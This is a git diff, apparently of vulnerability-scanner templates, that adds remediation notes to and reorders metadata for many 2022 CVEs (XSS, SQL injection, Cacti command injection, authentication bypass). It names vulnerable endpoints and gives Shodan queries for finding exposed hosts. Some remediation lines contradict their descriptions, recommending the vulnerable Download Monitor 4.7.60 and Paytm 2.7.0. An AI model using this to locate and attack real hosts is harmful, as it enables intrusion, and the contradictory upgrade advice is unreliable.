http://rukovoditel.com/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-44947 cwe-id: CWE-79 epss-score: 0.00088 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.36702 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.favicon.hash:-1499940355 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index da924d4015..aa4255478e 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/8 - http://rukovoditel.com/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-44948 cwe-id: CWE-79 epss-score: 0.00074 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.3053 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 05ca35336c..baf57d7b3b 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + remediation: | + Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/12 - http://rukovoditel.com/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-44949 cwe-id: CWE-79 epss-score: 0.00074 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.3053 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 2f4a227baf..74d911c817 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/10 - http://rukovoditel.com/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-44950 cwe-id: CWE-79 epss-score: 0.00074 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.3053 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 047599d29b..b3b3fc22f5 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/11 - http://rukovoditel.com/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-44951 cwe-id: CWE-79 epss-score: 0.00074 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.3053 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 6c9ea339d2..9c0ef4ed25 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/9 - http://rukovoditel.com/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-44952 cwe-id: CWE-79 epss-score: 0.06042 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.92539 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index 5f4c2ea395..e357a922aa 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field. + remediation: | + Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability. reference: - https://github.com/WBCE/WBCE_CMS - https://shimo.im/docs/dPkpKPQEjXfvYoqO/read @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-45037 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* epss-percentile: 0.31826 + cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: - max-request: 5 verified: true + max-request: 5 vendor: wbce product: wbce_cms tags: cve,cve2022,xss,wbce,cms,authenticated diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index 81c75cc893..ea453bea03 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field. + remediation: | + Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor. reference: - https://github.com/WBCE/WBCE_CMS - https://shimo.im/docs/Ee32MrJd80iEwyA2/read @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-45038 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* epss-percentile: 0.31826 + cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: - max-request: 5 verified: true + max-request: 5 vendor: wbce product: wbce_cms tags: cve,cve2022,xss,wbce,cms,authenticated diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 9108a13462..d67fa08ebf 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -6,13 +6,15 @@ info: severity: medium description: | The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) + remediation: | + Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability. reference: - https://github.com/RandomRobbieBF/CVE-2022-45354 - https://wordpress.org/plugins/download-monitor/ metadata: verified: true - shodan-query: html:"/wp-content/plugins/download-monitor/" max-request: 1 + shodan-query: html:"/wp-content/plugins/download-monitor/" tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp http: diff --git a/http/cves/2022/CVE-2022-45362.yaml b/http/cves/2022/CVE-2022-45362.yaml index 44bd72e075..13c4388e52 100644 --- a/http/cves/2022/CVE-2022-45362.yaml +++ b/http/cves/2022/CVE-2022-45362.yaml @@ -5,6 +5,8 @@ info: author: theamanrawat severity: high description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability - https://wordpress.org/plugins/paytm-payments/ @@ -14,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-45362 metadata: - max-request: 1 verified: true + max-request: 1 tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm http: diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 171363e953..582761084a 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -6,19 +6,19 @@ info: severity: critical description: | WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Update to version 2.7.7 or a newer patched version. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45805 - remediation: Update to version 2.7.7 or a newer patched version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45805 cwe-id: CWE-89 metadata: - max-request: 2 verified: true + max-request: 2 tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated http: diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index 2ad70d2009..d40fe660b5 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -6,19 +6,19 @@ info: severity: medium description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf - https://wordpress.org/plugins/phonepe-payment-solutions/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45835 - remediation: Fixed in version 2.0.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-45835 cwe-id: CWE-918 metadata: - max-request: 1 verified: true + max-request: 1 tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe http: diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 5e186231ac..60dd833485 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability. reference: - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html - https://seclists.org/fulldisclosure/2022/Dec/7 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-45917 cwe-id: CWE-601 epss-score: 0.00135 - cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* epss-percentile: 0.47995 + cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.html:"ILIAS" verified: true + max-request: 2 vendor: ilias product: ilias + shodan-query: http.html:"ILIAS" tags: redirect,packetstorm,seclists,cve,cve2022,ilias http: diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 79001b8f00..5ea9aca74e 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933). reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-45933 cwe-id: CWE-306 epss-score: 0.00535 - cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* epss-percentile: 0.74218 + cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"KubeView" verified: true + max-request: 1 vendor: kubeview_project product: kubeview + shodan-query: http.title:"KubeView" tags: cve,cve2022,kubeview,kubernetes,exposure http: diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 88c62e33ac..c10858d4eb 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WBCE CMS v1.5.4 can implement getshell by modifying the upload file type. + remediation: | + Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability. reference: - https://github.com/WBCE/WBCE_CMS - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-46020 cwe-id: CWE-434 epss-score: 0.00887 - cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* epss-percentile: 0.8053 + cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: - max-request: 6 verified: true + max-request: 6 vendor: wbce product: wbce_cms tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 4ae27a0840..074c2393a1 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46071/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46071 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-46071 cwe-id: CWE-89 epss-score: 0.01728 - cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* epss-percentile: 0.86294 + cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: helmet_store_showroom_site_project product: helmet_store_showroom_site tags: cve,cve2022,sqli,admin-bypass,helmet diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index 654eaa6dd2..e5f77e224f 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS). + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46073/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46073 @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-46073 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* epss-percentile: 0.31755 + cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: helmet_store_showroom_project product: helmet_store_showroom tags: cve,cve2022,xss,helmet-store-showroom diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index 0919c497a0..a78ac4b0a0 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability. reference: - https://security-tracker.debian.org/tracker/CVE-2022-46169 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-46169 cwe-id: CWE-78,CWE-74 epss-score: 0.96817 - cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* epss-percentile: 0.99543 + cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Login to Cacti" verified: true + max-request: 1 vendor: cacti product: cacti + shodan-query: title:"Login to Cacti" tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 9be7946e7a..c999f74e9d 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-46381 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Linear eMerge" verified: true + max-request: 1 vendor: niceforyou product: linear_emerge_e3_access_control_firmware + shodan-query: http.html:"Linear eMerge" tags: cve,cve2022,xss,emerge,linear http: diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index 8847704d75..b50863f36f 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46443/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46443 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-46443 cwe-id: CWE-89 epss-score: 0.11658 - cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* epss-percentile: 0.94542 + cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: bangresto_project product: bangresto tags: cve,cve2022,bangresto,sqli diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 8a51ed2af5..2074edbf42 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication + remediation: | + Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-46463 - https://github.com/Vad1mo @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-46463 cwe-id: CWE-306 epss-score: 0.01786 - cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* epss-percentile: 0.86525 + cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:657337228 verified: true + max-request: 1 vendor: linuxfoundation product: harbor + shodan-query: http.favicon.hash:657337228 tags: cve,cve2022,harbor,auth-bypass,exposure http: diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 304c5bf9bf..07f7de825d 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks.. + remediation: | + Upgrade to NexusPHP version 1.7.33 or later to mitigate this vulnerability. reference: - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities - https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-46888 cwe-id: CWE-79 epss-score: 0.00081 - cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* epss-percentile: 0.33383 + cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:-582931176 verified: true + max-request: 1 vendor: nexusphp product: nexusphp + shodan-query: http.favicon.hash:-582931176 tags: cve,cve2022,nexus,php,nexusphp,xss http: diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index e71a21493a..b9a92660cc 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/411 - https://nvd.nist.gov/vuln/detail/CVE-2022-46934 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-46934 cwe-id: CWE-79 epss-score: 0.00076 - cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* epss-percentile: 0.31252 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"kkFileView" verified: true + max-request: 1 vendor: keking product: kkfileview + shodan-query: http.html:"kkFileView" tags: xss,cve,cve2022,kkfileview http: diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index 096cca517f..c87f3accd0 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS. reference: - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html - https://github.com/MasaCMS/MasaCMS/releases/tag/7.3.10 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-47002 cwe-id: CWE-863 epss-score: 0.03141 - cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* epss-percentile: 0.89824 + cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: 'Generator: Masa CMS' verified: true + max-request: 3 vendor: masacms product: masacms + shodan-query: 'Generator: Masa CMS' tags: cve,cve2022,auth-bypass,cms,masa http: diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 5780dbdd47..3ee933bddc 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability. reference: - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html - http://mura.com @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-47003 cwe-id: CWE-863 epss-score: 0.01777 - cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* epss-percentile: 0.86482 + cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: 'Generator: Musa CMS' verified: true + max-request: 3 vendor: murasoftware product: mura_cms + shodan-query: 'Generator: Musa CMS' tags: cve,cve2022,auth-bypass,cms,mura http: diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index c03384020e..031ccd3df9 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + remediation: | + Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability. reference: - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2022-47615 @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-47615 cwe-id: CWE-434 epss-score: 0.00837 - cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.79914 + cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - publicwww-query: "/wp-content/plugins/learnpress" verified: true - framework: wordpress + max-request: 1 vendor: thimpress product: learnpress + framework: wordpress + publicwww-query: "/wp-content/plugins/learnpress" tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi http: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 0985cd8777..27025e8b5e 100644 --- 